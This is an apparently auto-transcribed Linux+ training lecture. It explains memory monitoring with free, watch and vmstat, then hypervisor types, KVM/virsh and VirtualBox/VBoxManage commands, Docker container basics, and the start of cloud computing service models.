As for the breakdown of those fields, we've actually reviewed this already, but we're going to review it one more time because we're now in the troubleshooting section of the training series, and this was covered earlier in it. You've probably noticed repetitions of various concepts we've looked at at least twice, and that's mainly because they're relevant to multiple things, not just one use: free can be used for troubleshooting, and it can also be used for swap and memory monitoring in the context of partitioning and file systems, so the same tool serves multiple purposes, as we've established. The fields are: the total amount of memory or swap space; the used amount; the free amount; shared, the memory used by the temporary file system; buff/cache, the memory used by buffers and the cache; and finally available, the memory still available after all of those are considered, not counting the swap space. Checking memory usage as another example, it's essentially the same command with different output: 8 GB total, 2 GB used, 500 MB shared, 1 GB dedicated to the buffer and cache, and 6 GB available after everything is considered.

If you want to monitor what's going on in real time, there's a very useful command we didn't cover before: watch. You use the watch command with -n 1, where the 1 means every second (if you did -n 5 it would be every 5 seconds, and so on), followed by free -h. This is a separate command from free, not something included under the free tool; the watch command stands on its own, and you can apply it to a variety of different command-line tools.
So we have watch -n 1 free -h, which says: watch this output every 1 second, essentially running free -h every second and providing a real-time version of the output. It's kind of like running top, except instead of top updating itself, we've cheated the system and we're re-running free -h every second so we can watch its output live. If you want to look at detailed memory information, you can use the cat command against /proc/meminfo. This is not part of free, but it gives you detailed information about memory usage directly from the proc file system; it technically shouldn't fall under free, but it was included in the course content, so this is how we'll look at it. You run cat to display the contents of that particular file, which shows detailed memory information straight from the process file system, similar in spirit to the results you'd get from free.

free -m displays memory in megabytes, -k displays it in kilobytes, and -g displays it in gigabytes. In my opinion you should just do free -h, because it determines the best unit by itself and provides the measurement in the associated metric: if it's less than a gigabyte, it gives it to you in megabytes, if it's less than a megabyte, in kilobytes, and so on. You don't necessarily need to run any of the fixed-unit options, but if you wanted to, now you know: k for kilobytes, m for megabytes, and g for gigabytes, if you want the output specifically in those measurements. We also have free -b, the option that displays memory in bytes, not even kilobytes, just the raw number of bytes, the smallest unit of measurement we can feed into free; and free -l, which includes statistics about low and high memory usage.

And as a summary, free is a very straightforward and essential tool for monitoring memory and swap usage on a system. If you use the -h option, it provides human-readable output, giving you the measurements in what it determines to be the best unit, kilobytes, megabytes, gigabytes, and so on, along with the used, free, shared, buff/cache, total, and available memory after all things are considered; you run free -h for that. If you want real-time monitoring, you use watch -n 1, which gives you a one-second repetition of the command, running free -h every second so you see a live update. And you can run the concatenate command, cat, on the /proc/meminfo file to get detailed memory information, which isn't strictly part of the free command but falls into the overall conversation we've had with top, htop, and of course now free.
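The free-related commands from this section, gathered as a sketch:

```bash
# Human-readable memory and swap usage (free picks the best unit itself)
free -h

# Re-run free -h every second for a live view (watch is a separate utility)
watch -n 1 free -h

# Detailed memory information straight from the proc file system
cat /proc/meminfo
```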
vmstat is another tool; it stands for virtual memory statistics, and it helps you look at system statistics like memory usage, CPU performance, and input/output operations as well. It helps the administrator, which is you, monitor and troubleshoot system performance effectively. You'd run all of these commands to get a variety of different information, or to see if there's something that maybe wasn't caught by htop, for example, that you're able to find with vmstat. The basic command would be vmstat 1 5: the first number means data is printed to the screen every second, a live count, and the second number means five iterations, so you get five entries printed onto the screen, giving you a snapshot of system activity over the specified interval.

This is what it would look like: the output of vmstat 1 5 is structured in several column groups. You have the processes themselves (procs), the memory, the swap, the input/output (io), the system itself, and the CPU being used, with the data for each of those under its heading. Under memory you have the swapped memory, the free memory, the buffer, and the cache in use; under the swap columns you have swap-in and swap-out, with nothing being used there in the example; under io you have the basic input and output, with 2 blocks coming in and 15 going out in this case; under system you have the in and cs columns, which I think we break down on the next slide; and then you have the CPU usage columns, showing the data for how the CPU is being used.

Here are the key fields. In the procs column, r represents the number of processes waiting for run time, the runnable processes, and b represents the number of processes in uninterruptible sleep, meaning they've been blocked. Under memory, swpd is the amount of virtual memory used, the swap space; free is the amount of idle memory; buff is the amount of memory used as buffers; and cache is the amount of memory used as the cache. Then you have the swap columns, si and so: si is the memory swapped in from disk, in kilobytes, and so is the memory swapped out to disk, in kilobytes. Say your RAM can't handle anything more than 8 GB; when usage goes to 8.1, that 0.1 has to move between RAM and disk, and si and so measure that traffic in each direction. Then io, input/output: bi is the blocks received from a block device, the input coming in, in blocks per second, and bo is the blocks sent to a block device, going out in blocks per second.
Then you have the system columns, in and cs: in is the number of interrupts per second, including the clock, and cs is the number of context switches per second, meaning you're switching from the text editor to the internet browser, from the browser to a video player, and so on; switches between different applications or processes happening per second, alongside the interrupts happening per second. Finally, we have the CPU portion, which gives us us, sy, id, wa, and st. us is the time spent running non-kernel code, the user time; this is the work being done by the user's own processes. sy is the time spent running kernel code, the work being run by the system, by the kernel, in the background. id is idle time. wa is the time spent waiting for input or output, which I'd say is a little different from idle: idle means there's absolutely nothing going on, whereas I/O wait means the computer is up, not asleep, not in hibernation, but still waiting for something to happen. And st is time stolen from a virtual machine.

Just to clarify that last one, because it was a little above my head as well: when you see "time stolen" in vmstat, it refers to CPU steal time. CPU steal time is the percentage of time that a virtual CPU within a virtual machine spends waiting for resources because the hypervisor is allocating those resources to another virtual machine on the same physical host. It's the time when your VM's vCPU is involuntarily idle because it can't get the necessary CPU from the physical machine. Picture a physical host with two virtual machines on it, each requiring a certain amount of CPU, a certain amount of processing power; if there isn't enough CPU to allocate to both machines and one of them is taking most of the processing power, then the second machine is getting its processing time stolen. Steal time means processing time has been taken from one virtual machine because another virtual machine is overloaded and taking too much. It happens because the hypervisor manages multiple VMs and has to distribute the physical CPU resources among them; if there are more VMs, or higher CPU demand, than the physical host can handle, some VMs will experience CPU steal time.

As for other ways to run it: vmstat 1, since we already established that the first number is the number of seconds it waits before refreshing the data, will continually update the system performance data every second until it's interrupted with Ctrl+C. If you ran vmstat 1 10, giving 10 as the second number, it would repeat for 10 iterations and then stop automatically by itself. If you run vmstat with no arguments, it's a single snapshot; it won't repeat itself, it just gives you one picture of system performance at the moment you ran the command. And vmstat 5 10, which is what we see here, updates every 5 seconds for 10 iterations, displaying the performance data 10 times, once every 5 seconds.
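And a sketch of the vmstat invocations just described:

```bash
# One sample per second, five iterations, then stop
vmstat 1 5

# Continuous one-second updates until interrupted with Ctrl+C
vmstat 1

# A single snapshot of system activity at this moment
vmstat
```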
And this is our summary for vmstat: another essential tool for monitoring and analyzing system performance, providing detailed statistics on CPU, memory, and I/O (input/output) operations. When you understand and utilize it, you can effectively identify and troubleshoot system performance issues as an administrator. You'd use it in conjunction with top, htop, free, and so on; these belong in your suite of tools, your arsenal, when you're troubleshooting system resources: the amount of CPU being used, the amount of RAM being used, which processes are running, and how much each of them is taking. As you saw, you get different results from each of these tools, so together they give you more context about what's going on within any given machine, so you can figure out the overall picture. vmstat, as the name implies, gives you virtual memory statistics; free gives you the free memory that's available; top gives you the processes that are running and the amount of memory or RAM they're using. All of these serve a different purpose, and used in conjunction with each other they give you a full picture, a great idea of what's going on inside your computer's environment or your network's environment.

All right, now we need to talk about virtualization and cloud computing. This isn't going to be on the Linux+ examination, or at least not the version we mentioned at the top of this training series, but they do upgrade and update their certification exams relatively frequently, so for whenever this does get included in the examination process, I want you to be aware of these concepts. Even if they're not covered in the exam, understanding what virtualization and cloud computing are makes you a much better administrator, and this is in no way limited to Linux; it's a very important topic to talk about, especially when we're talking about deploying Linux. We actually touched on some of this during the installation process in chapter 3, when I showed you how to boot from a USB drive, how to install onto a USB drive, and how to set up a dual boot on your machine so you can run multiple versions of an operating system, or different operating systems, on the same machine; that's adjacent to virtualization, and cloud computing is a little different but obviously in the same ballpark.

Just as an introduction to virtualization, the first thing to understand is this: think of your computer, or the computer I'm recording this on, or even your cell phone, as a machine. Then we can talk about the physical version of that machine versus a virtual version of it. You could have a Windows machine that is a physical computer, or a Windows machine that is a virtual computer, a virtual machine, and the way we create the virtual version is through virtualization.
Virtualization is just the technology that allows multiple virtual machines to run on a single physical machine, and that physical machine could be something as simple as somebody's home computer or a mid-sized server at Amazon AWS, on Google Cloud, on Microsoft Azure, any of those. It's the same concept overall, just different sizes of physical machines ending up hosting the variety of virtual machines. This approach, this concept of virtualization, improves the use of resources and gives you isolated environments for a variety of purposes: running different applications or operating systems, building test environments, anything along those lines; virtualization is very, very powerful for all of it.

That's essentially what virtualization is, and then there are a few key concepts to really wrap your head around. As I already mentioned, virtual machines are basically simulations of physical computers: a software-based version of a physical computer that could live on a USB drive and be booted from it, be booted from a cloud service provider, or be booted on the actual computer you're watching this video on. That's basically what it is, a simulation of an actual computer, running an operating system, Windows or macOS or Linux and so on. Each virtual machine runs its own OS and the applications inside that OS, all independent of each other while sharing the same physical host; one physical host can have a hundred VMs running on it, or a thousand VMs in the case of a mega-server at some enterprise location, whether they house it in their own building or buy capacity from a cloud service provider. There is isolation, meaning the failure or compromise of one VM will not affect the others. If you want to test something in an isolated environment, you boot up a virtual machine, test on it, make sure everything's all good, and if it crashes, who cares: it's that one singular virtual machine, and you can take it down as quickly and easily as you put it up, and just keep testing until it's actually ready before deploying to the rest of your enterprise environment. You also isolate these machines from each other for security purposes, so that in case something happens, one machine crashing doesn't affect the rest of your environment and your network. That's the overall understanding and concept of virtual machines.

Now, there's something that helps you create, deploy, and manage virtual machines, and that is the hypervisor. The hypervisor is basically software, or firmware so to speak, depending on the type of hypervisor you're using, but it serves the same purpose either way: it helps you create, manage, deploy, and take down virtual machines. That's basically what it does. With the hypervisor you also allocate the amount of resources designated to each of these virtual machines, and you keep them separate from each other, isolated from each other. So the hypervisor boots them up, deploys them, allocates how much of the physical machine's resources each one gets, and keeps them all separate from each other.
The first type of hypervisor is known as the bare-metal hypervisor, and I'll give you a visual shortly so you understand the difference between the two types. A Type 1, or bare-metal, hypervisor runs directly on the physical hardware — the CPU, motherboard, RAM, power supply, and everything else physically required to build a computer. The hypervisor sits on top of that hardware, and from the hypervisor you boot your virtual machines. It does not require a host operating system — I'll explain what that means when we get to the second type — it sits right on top of the physical hardware, and from there you boot all the operating systems and applications you run in your environment. Because it sits directly on the hardware, this is the higher-performing type of hypervisor, and it's very common in enterprise environments with hundreds if not thousands of employees who need machines provided to them. Examples of bare-metal hypervisors: VMware ESXi, which is very widely used in enterprise environments and supports many features for managing virtual machines; Microsoft Hyper-V, another powerful hypervisor that's included with Windows Server and provides comprehensive virtualization capabilities; and Xen, the open-source bare-metal hypervisor known for its scalability, which makes it usable in enterprise environments with limited budgets while remaining very secure — a notable mention that, despite being open source, is still very useful in large production environments.

Then we have the Type 2 hypervisor, known as the hosted hypervisor, which runs on top of the operating system already on your computer. Imagine the Mac I'm recording this on: that computer acts as the host, we install a hypervisor application on it, and with that hypervisor I deploy multiple virtual machines that all share the resources inside my MacBook. If my MacBook has 8 GB of RAM, all of the virtual machines rely on that 8 GB of RAM. That's what it means to have a hosted hypervisor: the computer serves as the host, the VMs use that computer's resources, and the computer runs its own operating system — Mac, Windows, whatever it may be. The machine already running an OS serves as the host, and on top of that sits the hypervisor that deploys your virtual machines and applications. This is mostly used for desktop virtualization or smaller environments.
This is not something you would do for a thousand employees; it's typically a much smaller-scale way of running a hypervisor, and it depends on the resources of the host computer. VirtualBox is one of the most common Type 2 hypervisors — you've probably heard of it, because it's an open-source hypervisor used heavily to deploy guest operating systems. If your computer is the host, everything running on top of it is a guest OS, a guest VM. It's very easy to deploy with VirtualBox: you download it, and as long as you have an ISO image (as we covered in the installation process in chapter 3), you can run as many virtual machines as your computer's hardware and processing power allow. VMware Workstation is the commercial hosted hypervisor — it does essentially the same thing, running and managing multiple VMs on a desktop computer. Of course, in a commercial environment you'd need a much faster host than something running 8 or 16 GB of RAM with a basic CPU; the host still needs to be strong enough if it's going to virtualize, say, over a dozen VMs. The last one is Parallels Desktop, which is designed specifically for macOS and allows you to run Windows and other operating systems on top of a Mac — macOS needs its own dedicated hypervisor, and Parallels Desktop serves that role.

There are a lot of advantages to doing this. I'm going to go over three or four main categories, but depending on who you ask, there's an abundance of advantages to virtualization. The first is efficient use of resources and how quickly you can scale up or scale down. Because VMs share the same physical resources, it's cost-efficient: instead of spending money on 25 computers, you can launch 25 virtual machines from the same hardware and connect them to monitors, keyboards, and mice. Those endpoint machines — sometimes called dumb terminals, or just terminals — have no real hardware of their own; they just connect to the powerful central computer that holds all the physical hardware, and 25 different employees can use 25 terminals. When you hire somebody new, you don't have to buy a new computer — you just launch another VM from the same physical resources and hand over a keyboard, mouse, and monitor. The hardware cost is far lower with virtualization than buying 25 individual computers. The other piece is scaling up and down: if you let half of your people go, you don't need to
worry about getting rid of half of your computers — you just delete half of the virtual machines currently deployed on your hypervisor, and it's as easy as selecting them and clicking delete. Scaling up or down with virtualization is simply not complicated.

The next advantage is isolation and its connection to security — these two go hand in hand. Because each virtual machine operates independently, as its own computer, a failure doesn't spread: if one VM fails, it doesn't affect the rest of the network; you just reboot it or launch another one and you should be all good. If one VM gets hacked — assuming the passwords across the rest of your network are strong — whatever ransomware or virus lands on that particular VM won't affect the other machines, because it is literally isolated as its own computer. It's exactly like a physical network: if one physical computer gets compromised, the rest of the physical computers aren't automatically affected, and each VM is essentially a separate computer in the same way. It's isolated in its own environment, and if it gets hacked or crashes, it won't take down the rest of the computers on your network. Isolation and security go hand in hand: when you can isolate a compromised machine from the rest of your network, you're protecting the rest of your network.

Then there's the flexibility and agility of testing, developing, and deploying. Because you can deploy quickly, when somebody new joins, you just run the same installation process on your hypervisor from the same ISO, deploy a new virtual machine, connect it to one of the existing terminals, and give that person their own username and password. If the employee who normally uses that terminal isn't working that day, or the two work separate schedules, both can run their own VMs from that same exact terminal, as long as each has their own dedicated login credentials. Testing and development are just as easy, because everything happens in an isolated environment: if you want to test a new product or software launch without affecting the rest of your network, you do it on a virtual machine, test it, do any extra configuration or development you need, and once all your t's are crossed and your i's are dotted, you deploy it to the rest of your environment and make sure all the other computers have it. It's very flexible and very agile — you can scale up or down as needed, very quickly, without buying new machines or selling the current ones. If you add 10 new employees for your night shift, they can all use the same terminals and just get their own login credentials — that's it.
like it’s very very simple and easy to do and finally there’s the disaster recovery portion of it that um you know so let’s go back to the the concept of having 25 physical machines right so if you wanted to take a snapshot a backup of 25 physical machines then instead of having to plug each machine into an external hard drive and then run whatever software you would use to back up that uh computer’s contents on the the external hard drive you would just go to your hypervisor you would select all so select all of the machines and then run the backup within the hypervisor and then go to lunch and come back and all of the contents of all of those 25 virtual machines have been backed up on your external hard drive and if you can think about it so if we go back to the file system hierarchy that we reviewed at the very beginning of this training series and you you consider that you know every computer technically is just a massive file system and it has the root folder the root directory and inside of the root directory there’s a bunch of primary uh directories and then those primary directories are extended into a bunch of other directories and then those directories contain a bunch of files and folders and so on and so forth so when you think about it as a large file basically right so you have one root file and inside of that file there’s a bunch of other files folders when you think about it that way it’s basically as simple as copy pasting right so that’s what it’s like when you have a virtualized environment you click on one little line item inside of the hypervisor and that represents a computer and all of the contents of that hypervisor or all of that VM would be backed up using that hypervisor and it’s so simple to do so it’s it’s much much simpler process than having to back up 25 physical machines so this is one of the probably one of the biggest advant as far as convenience is concerned it’s one of the biggest advantages of using virtual machines and if there’s any disaster or you you lose your power or the building burns down or something like that it’s like all of these things are stored inside of this one virtualized environment that can easily be accessed especially if you’ve developed redundancies which is very important in security and disaster recovery and you have multiple locations that are connected to that same hypervisor and then if one Lo goes through an earthquake that means they’re all good that you can still launch all of those computers all of those virtual machines because you have these redundancies that are essentially connected to the same hypervisor the same virtual environment so very very powerful concept and uh as a summary really what we need to understand is that there are two types of hypervisors so if you know what a virtualization is and if you understand the concept of virtual machine you need to understand that there are two types of hypervisors we have the type one and then type two type one sits on top of the physical infrastructure type two sits on top of a already running computer which is would be the host computer and then from there you would deploy your virtual machines but I do want to show you this visual because I really believe that visuals actually help kind of uh embed Concepts into your brain and really drive the point home so uh let me just show you this real quick so this is a very simple visual representation of the types of hypervisor so we have the type 1 hypervisor on the left side here and this is the hardware so the CPU the 
motherboard, the RAM, the graphics card, the power supply, and everything else a computer needs to run. On top of the hardware sits the hypervisor — there is no operating system in between. That's the Type 1, bare-metal hypervisor, and from it you launch your various web applications, applications, operating systems, terminal computers, and so on. You can see why this is more efficient and performance-driven: there's no operating system between the hardware and the hypervisor deploying those operating systems. The Type 2 would be my laptop, for example, or your computer: there's the hardware; on top of the hardware is a Windows or Mac operating system being used as the main computer; and then you've downloaded the hypervisor as a piece of software, and that hypervisor helps you launch your various virtual machines. And that's basically it — it doesn't go much deeper than this. The details from here would be: which hypervisor are you using, and how do you use it? Or are you going to use a cloud service provider to act, technically, as your hypervisor — renting infrastructure from their massive server rooms and data centers, using their interface to launch your virtual machines, then giving your employees logins so they access those machines from their own computers? That's where the details come in, but the overall concept is exactly this. If you rent services from a cloud provider, you're technically in a hosted environment: from your current computer's operating system, you log into a web browser, go into Google Cloud, and deploy 100 virtual machines using Google Cloud's hypervisor. Each of those virtual machines gets an IP address or a login link; each login link gets a username and password assigned to a person; and that person accesses that particular virtual machine or web application from their own computer. That's really as deep as you need to go to understand how cloud environments and virtual machines work. Once we have that, we can get into the nitty-gritty — this cloud provider does this, that one does that — but it's all essentially the same concept with a bit more nuance. So that's the difference between a Type 1 and a Type 2 hypervisor.

If we look at specific Type 1 hypervisors: KVM, the Kernel-based Virtual Machine, acts as a Type 1 hypervisor and is integrated directly into the Linux kernel. It sits right on top of the physical hardware and transforms the Linux operating system into a very powerful, efficient virtualization host capable of running multiple VMs with various guest
operating systems — and this is typically done in a server environment. KVM is integrated with the Linux kernel, which — as you already know — connects the user to the physical infrastructure; that integration makes KVM highly efficient and able to leverage the existing Linux infrastructure. It lets KVM take advantage of Linux features like memory management, process scheduling, and input/output handling, giving it robust performance and scalability, and it makes allocating resources easy and efficient. KVM uses hardware-assisted virtualization — which is part of what makes it a Type 1 hypervisor — supported by processors with Intel VT-x or AMD-V technology. You should recognize Intel and AMD just by name: they make computer chips (and, yes, really good graphics cards), and we're talking about physical processors here. This hardware support allows KVM to efficiently allocate resources like CPU, memory, and I/O to virtual machines, keeping performance and overhead balanced. So, in short: the Kernel-based Virtual Machine (KVM) is a Type 1 hypervisor that sits on top of the physical computer, and from there you launch a variety of virtual machines. It supports many guest operating systems — you can launch Windows, Linux, BSD, and others from KVM — and each virtual machine runs its own OS, configured with its own hardware specifications: how much CPU it will use, how much RAM it gets, how much storage it gets, and so on. It does the same job as any Type 1 hypervisor; this one is of note for us because it is the Linux hypervisor — a Linux virtual machine manager that is nonetheless compatible with Windows and any other operating system you'd want to install on your virtual machines.
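As an aside — not covered in the slides above, but a common sanity check — you can confirm that your processor actually exposes hardware-assisted virtualization before relying on KVM. On x86 systems, Intel VT-x appears as the `vmx` CPU flag and AMD-V as `svm`:

```bash
# Count CPU flags indicating hardware virtualization support;
# a result of 0 means KVM acceleration is unavailable on this host.
grep -Ec '(vmx|svm)' /proc/cpuinfo

# On Debian/Ubuntu-based systems, kvm-ok (from the cpu-checker
# package) gives a friendlier verdict.
kvm-ok
```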
virsh is the command-line tool — the command-line interface — that interacts with KVM; it's the interface you use to manage KVM-based VMs. It's part of the libvirt virtualization toolkit, which provides an API for interacting with hypervisors, including KVM and a variety of others. If you want to start a virtual machine from the command line using virsh, it's as simple as running `virsh start` followed by the name of the VM — whatever name you designated previously — and it starts that virtual machine. It's a very intuitive, easy-to-understand command line: if the machine's name were my-virtual-machine, you'd just say `virsh start my-virtual-machine`. You can list the running virtual machines using `virsh list` — very simple — which displays the IDs, names, and current states of all currently running VMs. In an example output you might see two virtual machines, my-virtual-machine and another-vm, both in the running state. If you want to shut something down, you use the opposite of start: `virsh shutdown` followed by the VM name, and it shuts that virtual machine down gracefully — I love that wording; it gracefully shuts it down, making sure everything is in order — for example, `virsh shutdown my-virtual-machine`. A couple of examples, just to engrain this: `virsh start ubuntu-vm` starts the Ubuntu VM; `virsh list` displays all currently running virtual machines; and `virsh shutdown ubuntu-vm` stops the Ubuntu VM from running. So: KVM is the Type 1 hypervisor integrated into the Linux kernel; it enables virtualization on Linux hosts; you can run multiple VMs with a variety of operating systems; and these are your basic commands — start a VM, view the running VMs, stop a VM. Actually deploying virtual machines with KVM is outside the scope of this discussion; for now, know that the tool used to interact with KVM — the Kernel-based Virtual Machine — is the virsh command line, and from there the commands are as simple as starting, stopping, and listing whatever has been deployed on that hypervisor.
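Here's that basic lifecycle in one place — a minimal sketch assuming a libvirt-managed VM named `ubuntu-vm` already exists on the host:

```bash
# Start the VM by name
virsh start ubuntu-vm

# List running VMs (add --all to include stopped ones)
virsh list
#  Id   Name        State
# ----------------------------
#  1    ubuntu-vm   running

# Ask the guest OS to shut down cleanly
virsh shutdown ubuntu-vm
```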
VirtualBox is another really commonly and widely used Type 2 hypervisor — as we reviewed, this one sits on top of a host machine. It's developed by Oracle, and it's very popular because it's compatible with different operating systems — Linux, Windows, macOS — and it's commonly used for testing and development environments. It provides an easy-to-set-up, flexible platform — it's literally like installing any software, walking through the installation wizard's prompts — for running multiple operating systems on a single machine. Among its key features: it's compatible with a variety of host platforms, which makes it versatile, and it can run many guest operating systems — Windows, Linux, macOS, Solaris, and others — so it's cross-platform compatible: you can run it on Windows or Linux to launch Windows or Linux. It's very easy to use: a couple of clicks to download the installer, install it, and then use the GUI — the graphical user interface — to walk through the prompts and click the buttons needed to start up a new virtual machine. There's a lot of documentation available for VirtualBox, because it's one of the most commonly used virtualization tools — one of the most commonly used hypervisors — and if you really want to be nerdy about it, you can use its command-line interface for management, automation, scripting, and a variety of other tasks. If you really want to get good at VirtualBox and virtualization in general — which I recommend — go look into it. I'm not going to go deep into the VirtualBox command line and its use cases here, but there are plenty of tutorials available, and if enough people want to see it, I may create a dedicated video using VirtualBox, because again, it's one of the most commonly used tools for virtualizing VMs. Some more key features: snapshot functionality lets you capture the current state of a VM — meaning you can take backups of the computer very easily. As I mentioned earlier, it's as simple as clicking one of the virtual machines in your list of VMs and taking a snapshot of it, backing up its contents — a very easy way to create virtual images, so to speak, to keep as your backup. Guest Additions are tools that enhance the performance and usability of the guest operating system: you can improve a guest's graphics, share folders between all of your operating systems, or get mouse integration — that last one is kind of a gimme, but the shared-folders part is very important, and improving the graphics of a guest OS right from your virtualization hypervisor is a very cool little feature. And for the nerds: VBoxManage is the command-line interface for managing VirtualBox VMs — the CLI you'd use to virtualize machines from the command line or to write scripts for virtualizing machines, which is where scalability comes in, in an easy, convenient format. Once you learn to script, you can launch a dozen machines with a single script, which makes virtualizing VMs even easier. So VBoxManage is the CLI for launching virtual machines: `VBoxManage startvm "VM name"` — a bit more of a mouthful than virsh, but the same concept. You call the VBoxManage tool, give it the startvm subcommand, and pass the name of the virtual machine. As an example, if ubuntu-vm is the name of the virtual machine, you'd run `VBoxManage startvm ubuntu-vm`.
If you want to list VMs, the same idea applies — instead of `virsh list`, it's `VBoxManage list vms`, which lists all the VMs registered with VirtualBox, displaying their names, UUIDs, and so on. Looking at an example output: you might see an Ubuntu VM and a Windows 10 VM — a Linux VM as well as a Microsoft Windows VM — along with the UUIDs associated with each of the virtual machines launched through VirtualBox. Then there's `VBoxManage controlvm "VM name" poweroff` — again more of a mouthful than the virsh equivalent — which forces the specified VM to power off; you replace the placeholder with the name of the VM you want to turn off, for example powering off ubuntu-vm. A couple of examples to review these commands: `VBoxManage startvm debian-vm` starts the Debian VM; `VBoxManage list vms` lists all registered VMs with their names and UUIDs; and stopping a VM is done with `controlvm`, the name of the virtual machine, and the `poweroff` command. In summary, we have the VBoxManage commands for managing VMs, and we have VirtualBox itself — probably one of the most popular Type 2 hypervisors, if not the most popular. It's super easy to download and install, it's very flexible because you can run multiple operating systems on a single computer, and it's used for testing, development, and a variety of other tasks because it's so compatible with various host and guest operating systems. That cross-compatibility between host and guest operating systems is, again, what makes it one of the most popular hypervisors on the market.
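The same lifecycle with VBoxManage — a sketch assuming VMs registered under the hypothetical names `ubuntu-vm` and `debian-vm`; the snapshot line uses the snapshot feature described above, with a made-up snapshot name:

```bash
# Start a registered VM (add --type headless to run without a window)
VBoxManage startvm ubuntu-vm

# List all registered VMs with their names and UUIDs
VBoxManage list vms

# Take a snapshot of the current state as a restorable backup
VBoxManage snapshot ubuntu-vm take clean-install

# Force the VM off (the virtual equivalent of pulling the plug)
VBoxManage controlvm debian-vm poweroff
```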
Docker and containers are the next layer of this picture — a lighter-weight way to package and isolate applications than full virtual machines. Docker is a popular containerization tool that enables us to package applications and their dependencies into portable containers. These containers run consistently across different environments, ensuring that the application behaves the same regardless of where it's deployed: you have a container — a compartment, so to speak — that includes an application and all the dependencies that application needs to run, and you can launch it on a Windows computer, a Linux computer, and so on, all within your virtualized environment — it's something a virtual machine can host. Comparing a container to a virtual machine: containers are isolated environments that share the host operating system's kernel. They're lightweight, fast to start, and don't require a full operating system. A container includes everything needed to run the application — the code, the runtime, etc. — but the container is not the OS. The virtual machine is the OS; the container is an isolated environment that uses that OS. And to complete the comparison: the virtual machine runs on the hypervisor and includes its own OS, while the container runs on the virtual machine, essentially — or on the host operating system, meaning your own computer. A container hosts the application and its dependencies, but it needs something to run on: either the operating system provided by a virtual machine or the host OS itself. Each VM operates independently with its own OS, which increases resource usage, as we've already established; containers don't run their own OS, so they're more lightweight and faster to start. Docker containers run on anything that supports Docker, which means they're consistent across development, testing, and production environments. They're isolated — you can manage the file system and processes inside each one, across the variety of operating systems they run on — which means multiple applications can run on the same host without interfering with each other. That's really just a fancy way of saying you can compartmentalize a group of applications: separate them from each other, run them independently of each other, all on the same host. They're portable — a container image can essentially be transferred via email or a file share — and they're isolated, running by themselves without interfering with one another while sharing the same host operating system. The benefits are many. They're efficient and lightweight, as mentioned — they don't use as many resources from the hardware or the operating system, and starting one is pretty much like starting a piece of software, because that's roughly what they are. They're scalable, easily scaled up or down based on demand; they can be shared across a variety of operating systems; and they're ideal for microservices and cloud-native applications. The cloud is really where they come into play: cloud providers offer these containers with applications preinstalled, and you can download and install one onto a virtual machine — or onto a hundred of your virtual machines — fairly easily, because they're so compatible and they scale so well. To run one, you use the docker command — Docker is the tool that runs the image of a container. The -it option allows you to interact with the container via the terminal: you say `docker run -it` followed by the image name, replacing the image name with whichever container you want to run. As an example, `docker run -it ubuntu` runs Ubuntu — but you're running Ubuntu as an application, technically, not as an operating system, which is why it's faster to start: it uses the host operating system's resources to run.
So this is not Ubuntu running as an operating system; it's Ubuntu running as a container on top of your host operating system — which, again, is why containers are so native to cloud environments: when you're using a cloud environment, you're technically using a hypervisor and your rented resources to launch that Ubuntu for you. Then you have `docker ps` to list the containers you have: it lists all currently running containers, displaying their IDs, names, statuses, and more. In the example output you can see the container ID; the image, meaning what is actually running; the command it was started with — a bash shell in this case; that it was created 2 hours ago and has been up for 2 hours; that no ports are mapped; and the name that's been assigned to it. That's it — that's what it looks like. If you want to stop that exact container, you just run `docker stop` followed by the container ID — the ID in that first column — and just like that, it stops that container from running. If you want to pull an image — meaning download the specified Docker image from Docker Hub to your actual computer, the local host machine you're running on — you use `docker pull` followed by the image name: for example `docker pull ubuntu`, or `docker pull nginx`, which pulls the latest nginx image from Docker Hub onto your computer. Docker Hub is the registry where all of these images — the varieties of Ubuntu, nginx, and all the rest — are stored; from there you can run them, download them onto your local computer, or install them on your virtual machines. If you want to remove something, it's as simple as the remove command: `docker rm` removes a stopped container — you have to stop the container first, and then you remove it from your list of containers. It's fairly simple and very intuitive: you give it the ID, the same ID you used to stop it. And if you want to remove an image rather than a container, you use `docker rmi`. The plain `docker rm` command needs the container's ID, but it's more convenient to work with image names than IDs (unless you're copy-pasting), so to remove an image by name you just run `docker rmi` followed by the image name, and it removes that specified Docker image. "ubuntu" is much easier to type than an ID number, so `docker rmi ubuntu` removes the Ubuntu image from your local machine.
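Put together, the whole container lifecycle looks something like this — a sketch assuming Docker is installed and its daemon is running; the container ID shown is hypothetical:

```bash
# Download the latest nginx image from Docker Hub
docker pull nginx

# Start an interactive Ubuntu container with a terminal attached
docker run -it ubuntu

# In another terminal: list running containers (IDs, images, names, status)
docker ps

# Stop a container by ID (or by its assigned name)
docker stop 3f4e8a21c9b7   # hypothetical container ID

# Remove the stopped container, then remove the image itself
docker rm 3f4e8a21c9b7
docker rmi ubuntu
```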
In summary, Docker simplifies creating, deploying, and running applications in isolated containers — that's basically what it does. The application is stored inside a container, and you use Docker to create it, deploy it, download it onto your local machine, run it, stop it, and so on — Docker is the tool you use to interact with the various containers. Inside those containers can be a variety of things: applications, or what you saw as that running Ubuntu image, which is technically not its own operating system, because it still runs on top of your host operating system — your computer. It's more lightweight to do it this way, so containers start faster than traditional virtual machines: actually starting a virtual machine takes more time and more resources, because it's heavier-duty than running a container that holds just the specific set of applications you want. Again, you're not launching the Ubuntu operating system — you're launching the set of applications stored inside that one container, which resembles what launching Ubuntu would be like, while your host operating system acts as the OS. A container might hold an nginx server plus the applications and dependencies connected to running an nginx server: you launch it, and your nginx server is up. And that was your cheat sheet of the commands we just covered — if you want to jot them down, pause the video or take a screenshot. One, two, three — moving on.

Now that we've talked about virtualization, virtual machines, Docker, and containers, and all that good stuff, we can talk about cloud administration — because essentially this is what virtualization leads to: you're dealing with the cloud, with virtual machines and virtual computers. Cloud computing is the technology that provides on-demand access to computing over the internet — on-demand access to virtual machines, containers, and so on. It includes servers, storage, databases, networking, software, and a variety of other resources, and you can provision and manage them with the click of a button. Cloud computing allows businesses and individuals to leverage these powerful resources without the need for physical hardware or extensive IT infrastructure, which is what makes it so freaking popular. The first service model is Infrastructure as a Service (IaaS) — infrastructure provided, as the name says, as a service by a cloud provider: virtualized hardware resources like virtual machines, storage, and networks, which allow the user to deploy and manage operating systems, applications, and development environments. The example is AWS EC2 — AWS has a variety of different services under its umbrella, and EC2 is compute capacity in the cloud, enabling users to run applications on virtual servers; that's Amazon's version of IaaS.
